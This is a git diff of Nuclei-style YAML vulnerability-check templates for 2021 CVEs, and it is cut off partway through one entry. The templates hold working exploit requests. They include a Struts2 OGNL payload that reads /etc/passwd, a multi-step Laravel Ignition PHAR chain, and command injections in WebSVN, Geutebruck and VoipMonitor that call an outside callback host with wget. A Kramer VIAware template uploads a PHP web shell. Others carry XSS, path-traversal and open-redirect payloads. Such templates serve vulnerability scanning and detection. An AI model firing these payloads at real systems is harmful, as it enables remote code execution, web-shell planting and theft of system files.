b/poc/cve/cve-2021-29490-6011.yaml @@ -0,0 +1,28 @@ +id: CVE-2021-29490 +info: + name: Jellyfin 10.7.2 SSRF + author: alph4byt3 + severity: medium + description: Jellyfin is a free software media system. Versions 10.7.2 and below are vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via the imageUrl parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-29490 + - https://github.com/jellyfin/jellyfin/security/advisories/GHSA-rgjw-4fwc-9v96 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cve-id: CVE-2021-29490 + cwe-id: CWE-918 + remediation: Upgrade to version 10.7.3 or newer. As a workaround, disable external access to the API endpoints "/Items/*/RemoteImages/Download", "/Items/RemoteSearch/Image" and "/Images/Remote". + tags: cve,cve2021,ssrf,jellyfin +requests: + - method: GET + path: + - "{{BaseURL}}/Images/Remote?imageUrl=http://{{interactsh-url}}" + - "{{BaseURL}}/Items/RemoteSearch/Image?ImageUrl=http://{{interactsh-url}}&ProviderName=TheMovieDB" + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + +# Enhanced by cs on 2022/02/25 diff --git a/poc/cve/cve-2021-29622.yaml b/poc/cve/cve-2021-29622.yaml deleted file mode 100644 index 2c7ddc4b80..0000000000 --- a/poc/cve/cve-2021-29622.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2021-29622 - -info: - name: Prometheus - Open Redirect - author: geeknik - severity: medium - description: Prometheus 2.23.0 through 2.26.0 and 2.27.0 contains an open redirect vulnerability. To ensure a seamless transition to 2.27.0, the default UI was changed to the new UI with a URL prefixed by /new redirect to /. Due to a bug in the code, an attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. - remediation: The issue was patched in the 2.26.1 and 2.27.1 releases. In 2.28.0, the /new endpoint will be removed completely. The workaround is to disable access to /new via a reverse proxy in front of Prometheus. - reference: - - https://github.com/prometheus/prometheus/security/advisories/GHSA-vx57-7f4q-fpc7 - - https://github.com/prometheus/prometheus/releases/tag/v2.26.1 - - https://github.com/prometheus/prometheus/releases/tag/v2.27.1 - - https://nvd.nist.gov/vuln/detail/CVE-2021-29622 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-29622 - cwe-id: CWE-601 - epss-score: 0.00225 - epss-percentile: 0.60673 - cpe: cpe:2.3:a:prometheus:prometheus:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: prometheus - product: prometheus - tags: cve,cve2021,prometheus,redirect - -http: - - method: GET - path: - - "{{BaseURL}}/new/newhttp://interact.sh" - - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4b0a00483046022100d75f4c5133606b067f8cabdb444b368dbf5da4507c4fae4e6cca9f7d2ba05b76022100d8a2030d157148b3638b0070fd6d6e8a3a38484d4666f0497a069ca8d47435ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2021-30461.yaml b/poc/cve/cve-2021-30461.yaml new file mode 100644 index 0000000000..c7a522674d --- /dev/null +++ b/poc/cve/cve-2021-30461.yaml @@ -0,0 +1,38 @@ +id: CVE-2021-30461 + +info: + name: VoipMonitor Pre-Auth-RCE + author: shifacyclewala,hackergautam + severity: critical + description: A malicious actor can trigger Un authenticated Remote Code Execution using CVE-2021-30461. + tags: cve,cve2021,rce,voipmonitor + reference: https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/ + +requests: + - raw: + - | + POST /index.php HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + Connection: close + Content-Type: application/x-www-form-urlencoded + Content-Length: 35 + + SPOOLDIR=test".system(id)."&recheck=Recheck + + matchers-condition: and + matchers: + - type: word + words: + - "uid=" + - "gid=" + - "groups=" + - "VoIPmonitor installation" + part: body + condition: and + + - type: status + status: + - 200 diff --git a/poc/cve/cve-2021-31249-6068.yaml b/poc/cve/cve-2021-31249-6068.yaml deleted file mode 100644 index 6dd6e07053..0000000000 --- a/poc/cve/cve-2021-31249-6068.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: CVE-2021-31249 -info: - name: CHIYU TCP/IP Converter devices - CRLF injection - author: geeknik - description: A CRLF injection vulnerability was found on BF-430, BF-431, and BF-450M TCP/IP Converter devices from CHIYU Technology Inc due to a lack of validation on the parameter 'redirect' available on multiple CGI components. - reference: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31249 - severity: medium - tags: cve,cve2021,chiyu,crlf,iot -requests: - - method: GET - path: - - "{{BaseURL}}/man.cgi?redirect=setting.htm%0d%0a%0d%0a&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY" - matchers-condition: and - matchers: - - type: status - status: - - 302 - - type: word - part: header - words: - - "Location: setting.htm" - - "" - condition: and diff --git a/poc/cve/cve-2021-3129.yaml b/poc/cve/cve-2021-3129.yaml deleted file mode 100644 index 519231a58e..0000000000 --- a/poc/cve/cve-2021-3129.yaml +++ /dev/null @@ -1,94 +0,0 @@ -id: CVE-2021-3129 - -info: - name: Laravel with Ignition <= v8.4.2 Debug Mode - Remote Code Execution - author: z3bd,pdteam - severity: critical - description: Laravel version 8.4.2 and before with Ignition before 2.5.2 allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2. - remediation: | - Upgrade Laravel to version 8.4.3 or higher to mitigate this vulnerability. - reference: - - https://www.ambionics.io/blog/laravel-debug-rce - - https://github.com/vulhub/vulhub/tree/master/laravel/CVE-2021-3129 - - https://nvd.nist.gov/vuln/detail/CVE-2021-3129 - - https://github.com/facade/ignition/pull/334 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-3129 - epss-score: 0.97488 - epss-percentile: 0.9997 - cpe: cpe:2.3:a:facade:ignition:*:*:*:*:*:laravel:*:* - metadata: - max-request: 6 - vendor: facade - product: ignition - framework: laravel - tags: cve,cve2021,laravel,rce,vulhub,kev - -http: - - raw: - - | - POST /_ignition/execute-solution HTTP/1.1 - Host: {{Hostname}} - Accept: application/json - Content-Type: application/json - - {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}} - - | - POST /_ignition/execute-solution HTTP/1.1 - Host: {{Hostname}} - Accept: application/json - Content-Type: application/json - - {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}} - - | - POST /_ignition/execute-solution HTTP/1.1 - Host: {{Hostname}} - Accept: application/json - Content-Type: application/json - - {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "AA"}} - - | - POST /_ignition/execute-solution HTTP/1.1 - Host: {{Hostname}} - Accept: application/json - Content-Type: application/json - - {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a"}} - - | - POST /_ignition/execute-solution HTTP/1.1 - Host: {{Hostname}} - Accept: application/json - Content-Type: application/json - - {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}} - - | - POST /_ignition/execute-solution HTTP/1.1 - Host: {{Hostname}} - Accept: application/json - Content-Type: application/json - - {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "phar://../storage/logs/laravel.log/test.txt"}} - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "uid=" - - "gid=" - - "groups=" - - "Illuminate" - condition: and - - - type: status - status: - - 500 - - extractors: - - type: regex - regex: - - "(u|g)id=.*" - -# digest: 4a0a00473045022100c6308e8a385d5456d3d4a6c9ff4fba41345787cf5f95d5a9b0641ef5293d07d50220324074ccb7a80ecc48ad853af5db9aa00f3d35ff61823430822705c3a9063c53:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/cve-2021-31589-6095.yaml b/poc/cve/cve-2021-31589-6095.yaml new file mode 100644 index 0000000000..1be8932582 --- /dev/null +++ b/poc/cve/cve-2021-31589-6095.yaml @@ -0,0 +1,35 @@ +id: CVE-2021-31589 +info: + name: BeyondTrust Remote Support Reflected XSS + author: Ahmed Abou-Ela + severity: medium + description: Unauthenticated cross-site scripting (XSS) vulnerability in BeyondTrust Secure Remote Access Base Software through 6.0.1 allow remote attackers to inject arbitrary web script or HTML. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2021-31589 + cwe-id: CWE-79 + metadata: + shodan-query: 'set-cookie: nsbase_session' + google-dork: '"BeyondTrust" "Redistribution Prohibited"' + reference: + - https://packetstormsecurity.com/files/165408 + - https://cxsecurity.com/issue/WLB-2022010013 + - https://beyondtrustcorp.service-now.com/csm?sys_kb_id=922d0ab31bc1b490e73854ae034bcb7b&id=kb_article_view&sysparm_rank=1&sysparm_tsqueryId=64fc14ffdb8f70d422725385ca9619cb + tags: cve,cve2021,beyondtrust,bomgar,xss +requests: + - method: GET + path: + - "{{BaseURL}}/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password" + matchers-condition: and + matchers: + - type: word + case-insensitive: true + part: body + words: + - '' + - 'bomgar' + condition: and + - type: status + status: + - 200 diff --git a/poc/cve/cve-2021-31682-6102.yaml b/poc/cve/cve-2021-31682-6102.yaml deleted file mode 100644 index 9c2b058981..0000000000 --- a/poc/cve/cve-2021-31682-6102.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2021-31682 -info: - name: WebCTRL OEM - Reflected XSS - author: gy741,dhiyaneshDk - severity: medium - description: The login portal for the Automated Logic WebCTRL/WebCTRL OEM web application contains a vulnerability that allows for reflected XSS attacks due to the operatorlocale GET parameter not being sanitized. This issue impacts versions 6.5 and below. This issue works by passing in a basic XSS payload to a vulnerable GET parameter that is reflected in the output without sanitization. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-31682 - - https://github.com/3ndG4me/WebCTRL-OperatorLocale-Parameter-Reflected-XSS - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2021-31682 - cwe-id: CWE-79 - tags: cve,cve2021,webctrl,xss - metadata: - shodan-query: 'html:"/_common/lvl5/dologin.jsp"' -requests: - - method: GET - path: - - '{{BaseURL}}/index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E' - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - part: body - condition: and - words: - - '">' - - 'common/lvl5' - - type: word - part: header - words: - - "text/html" diff --git a/poc/cve/cve-2021-31805(1).yaml b/poc/cve/cve-2021-31805(1).yaml deleted file mode 100644 index 8b70dbaa8d..0000000000 --- a/poc/cve/cve-2021-31805(1).yaml +++ /dev/null @@ -1,48 +0,0 @@ -id: CVE-2021-31805 -info: - name: Apache Struts2 S2-062 - Remote Code Execution - author: taielab - severity: critical - description: Apache Struts2 S2-062 is vulnerable to remote code execution. The fix issued for CVE-2020-17530 (S2-061) was incomplete, meaning some of the tag's attributes could still perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. - reference: - - https://cwiki.apache.org/confluence/display/WW/S2-062 - - https://github.com/Axx8/Struts2_S2-062_CVE-2021-31805 - - https://nvd.nist.gov/vuln/detail/CVE-2021-31805 - remediation: Avoid using forced OGNL evaluation on untrusted user input, and/or upgrade to Struts 2.5.30 or greater which checks if expression evaluation won't lead to the double evaluation. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-31805 - cwe-id: CWE-917 - tags: cve,cve2021,apache,rce,struts,struts2 -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF - Content-Length: 1095 - - ------WebKitFormBoundaryl7d1B1aGsV2wcZwF - Content-Disposition: form-data; name="id" - - %{ - (#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + - (#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) + - (#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + - (#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) + - (#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + - (#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) + - (#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) + - (#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) + - (#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat /etc/passwd'})) - } - - ------WebKitFormBoundaryl7d1B1aGsV2wcZwF— - matchers: - - type: regex - part: body - regex: - - "root:.*:0:0:" - -# Enhanced by mp on 2022/04/21 diff --git a/poc/cve/cve-2021-3223(1).yaml b/poc/cve/cve-2021-3223(1).yaml deleted file mode 100644 index 8507a7009f..0000000000 --- a/poc/cve/cve-2021-3223(1).yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2021-3223 -info: - name: Node RED Dashboard - Directory Traversal - author: gy741,pikpikcu - severity: high - description: Node-RED-Dashboard before 2.26.2 allows ui_base/js/..%2f directory traversal to read files. - reference: - - https://github.com/node-red/node-red-dashboard/issues/669 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3223 - - https://github.com/node-red/node-red-dashboard/releases/tag/2.26.2 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2021-3223 - cwe-id: CWE-22 - metadata: - verified: true - shodan-query: title:"Node-RED" - fofa-query: title="Node-RED" - tags: cve,cve2021,node-red-dashboard,lfi -requests: - - method: GET - path: - - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd' - - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2fsettings.js' - matchers-condition: or - matchers: - - type: regex - part: body - regex: - - "root:.*:0:0:" - - type: word - part: body - words: - - "Node-RED web server is listening" diff --git a/poc/cve/cve-2021-32305-6134.yaml b/poc/cve/cve-2021-32305-6134.yaml new file mode 100644 index 0000000000..5c6c729e5b --- /dev/null +++ b/poc/cve/cve-2021-32305-6134.yaml @@ -0,0 +1,31 @@ +id: CVE-2021-32305 +info: + name: Websvn <2.6.1 - Remote Code Execution + author: gy741 + severity: critical + description: WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter. + reference: + - https://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html + - https://github.com/websvnphp/websvn/pull/142 + - http://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-32305 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-32305 + cwe-id: CWE-78 + tags: cve,cve2021,websvn,rce,oast +requests: + - raw: + - | + GET /search.php?search=%22;wget+http%3A%2F%2F{{interactsh-url}}%27;%22 HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept: */* + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + +# Enhanced by mp on 2022/05/18 diff --git a/poc/cve/cve-2021-33544-6176.yaml b/poc/cve/cve-2021-33544-6176.yaml new file mode 100644 index 0000000000..78779b5b28 --- /dev/null +++ b/poc/cve/cve-2021-33544-6176.yaml @@ -0,0 +1,23 @@ +id: CVE-2021-33544 +info: + name: Geutebruck RCE + description: Multiple vulnerabilities in the web-based management interface of Geutebruck could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. + author: gy741 + severity: critical + reference: | + - https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/ + tags: cve,cve2021,geutebruck,rce,oob +requests: + - raw: + - | + GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Encoding: gzip, deflate + Cache-Control: max-age=0 + Connection: keep-alive + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" diff --git a/poc/cve/cve-2021-33807-6211.yaml b/poc/cve/cve-2021-33807-6211.yaml new file mode 100644 index 0000000000..4acf49004b --- /dev/null +++ b/poc/cve/cve-2021-33807-6211.yaml @@ -0,0 +1,38 @@ +id: CVE-2021-33807 + +info: + name: Cartadis Gespage 8.2.1 - Directory Traversal + author: daffainfo + severity: high + description: Cartadis Gespage through 8.2.1 allows Directory Traversal in gespage/doDownloadData and gespage/webapp/doDownloadData. + reference: + - https://www.on-x.com/sites/default/files/on-x_-_security_advisory_-_gespage_-_cve-2021-33807.pdf + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33807 + tags: cve,cve2021,lfi,gespage + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-33807 + cwe-id: CWE-22 + +requests: + - method: GET + path: + - "{{BaseURL}}/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log" + + matchers-condition: and + matchers: + + - type: word + words: + - "NetpDoDomainJoin:" + part: body + + - type: word + words: + - "application/octet-stream" + part: header + + - type: status + status: + - 200 diff --git a/poc/cve/cve-2021-34370-6221.yaml b/poc/cve/cve-2021-34370-6221.yaml new file mode 100644 index 0000000000..8973cec47a --- /dev/null +++ b/poc/cve/cve-2021-34370-6221.yaml @@ -0,0 +1,17 @@ +id: CVE-2021-34370 +info: + name: Accela Civic Platform 21.1 - Open Redirect & XSS + author: 0x_Akoko + description: Accela Civic Platform Cross-Site-Scripting and Open Redirect <= 21.1 + reference: https://www.exploit-db.com/exploits/49990 + severity: medium + tags: xss,redirect,cves +requests: + - method: GET + path: + - "{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://example.com/" + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header diff --git a/poc/cve/cve-2021-34643-6238.yaml b/poc/cve/cve-2021-34643-6238.yaml deleted file mode 100644 index 5a6cd61db5..0000000000 --- a/poc/cve/cve-2021-34643-6238.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2021-34643 -info: - name: Skaut bazar < 1.3.3 - Reflected Cross-Site Scripting - author: dhiyaneshDK - severity: medium - description: The Skaut bazar WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to the use of $_SERVER['PHP_SELF'] in the ~/skaut-bazar.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.3.2. - reference: - - https://wpscan.com/vulnerability/c1b41276-b8fb-4a5c-bede-84ea62663b7a - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34643 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2021-34643 - cwe-id: CWE-79 - tags: wordpress,cve,cve2021,wp-plugin,authenticated -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | - GET /wp-admin/options-general.php//?page=skatubazar_option HTTP/1.1 - Host: {{Hostname}} - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - type: status - status: - - 200 - - type: word - part: header - words: - - "text/html" diff --git a/poc/cve/cve-2021-35265-6245.yaml b/poc/cve/cve-2021-35265-6245.yaml deleted file mode 100644 index 013ce549c4..0000000000 --- a/poc/cve/cve-2021-35265-6245.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2021-35265 -info: - name: MaxSite CMS XSS - author: pikpikcu - severity: medium - description: Reflected cross-site scripting (XSS) vulnerability in MaxSite CMS before V106 via product/page/* allows remote attackers to inject arbitrary web script to a page. - reference: - - https://github.com/maxsite/cms/issues/414#issue-726249183 - - https://nvd.nist.gov/vuln/detail/CVE-2021-35265 - tags: cve,cve2021,maxsite,xss - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2021-35265 - cwe-id: CWE-79 -requests: - - method: GET - path: - - '{{BaseURL}}/page/1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - '{{BaseURL}}/maxsite/page/1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and - matchers: - - type: word - words: - - '' - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/poc/cve/cve-2021-36356(1).yaml b/poc/cve/cve-2021-36356(1).yaml new file mode 100644 index 0000000000..fc0224ed28 --- /dev/null +++ b/poc/cve/cve-2021-36356(1).yaml @@ -0,0 +1,35 @@ +id: CVE-2021-36356 +info: + name: Kramer VIAware - Remote Code Execution + author: gy741 + severity: critical + description: KRAMER VIAware through August 2021 allows remote attackers to execute arbitrary code because ajaxPages/writeBrowseFilePathAjax.php accepts arbitrary executable pathnames. + reference: + - https://www.exploit-db.com/exploits/50856 + - https://nvd.nist.gov/vuln/detail/CVE-2021-36356 + - https://nvd.nist.gov/vuln/detail/CVE-2021-35064 + - https://write-up.github.io/kramerav/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-36356 + cwe-id: CWE-434 + tags: rce,viaware,cve,cve2021,kramer +requests: + - raw: + - | + POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + radioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php + - | + GET /{{randstr}}.php?cmd=sudo%20rpm%20--eval%20'%25%7Blua:os.execute(%22wget%20http://{{interactsh-url}}%22)%7D' HTTP/1.1 + Host: {{Hostname}} + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + +# Enhanced by mp on 2022/05/18 diff --git a/poc/cve/cve-2021-37216-6280.yaml b/poc/cve/cve-2021-37216-6280.yaml deleted file mode 100644 index 168adaeeaa..0000000000 --- a/poc/cve/cve-2021-37216-6280.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2021-37216 -info: - name: QSAN Storage Manager prior to v3.3.3 Reflected XSS - author: dwisiswant0 - description: | - QSAN Storage Manager header page parameters does not filter special characters. - Remote attackers can inject JavaScript without logging in and launch - reflected XSS attacks to access and modify specific data. - reference: https://www.twcert.org.tw/tw/cp-132-4962-44cd2-1.html - severity: medium - tags: cve,cve2021,xss,qsan,storage - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2021-37216 - cwe-id: CWE-79 -requests: - - method: GET - path: - - "{{BaseURL}}/http_header.php" - headers: - X-Trigger-XSS: "" - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"HTTP_X_TRIGGER_XSS":""' - - type: word - part: header - words: - - "text/html" - - type: dsl - dsl: - - "!contains(tolower(all_headers), 'x-xss-protection')" diff --git a/poc/cve/cve-2021-37416(1).yaml b/poc/cve/cve-2021-37416(1).yaml new file mode 100644 index 0000000000..3f2ac17b38 --- /dev/null +++ b/poc/cve/cve-2021-37416(1).yaml @@ -0,0 +1,38 @@ +id: CVE-2021-37416 +info: + name: Zoho 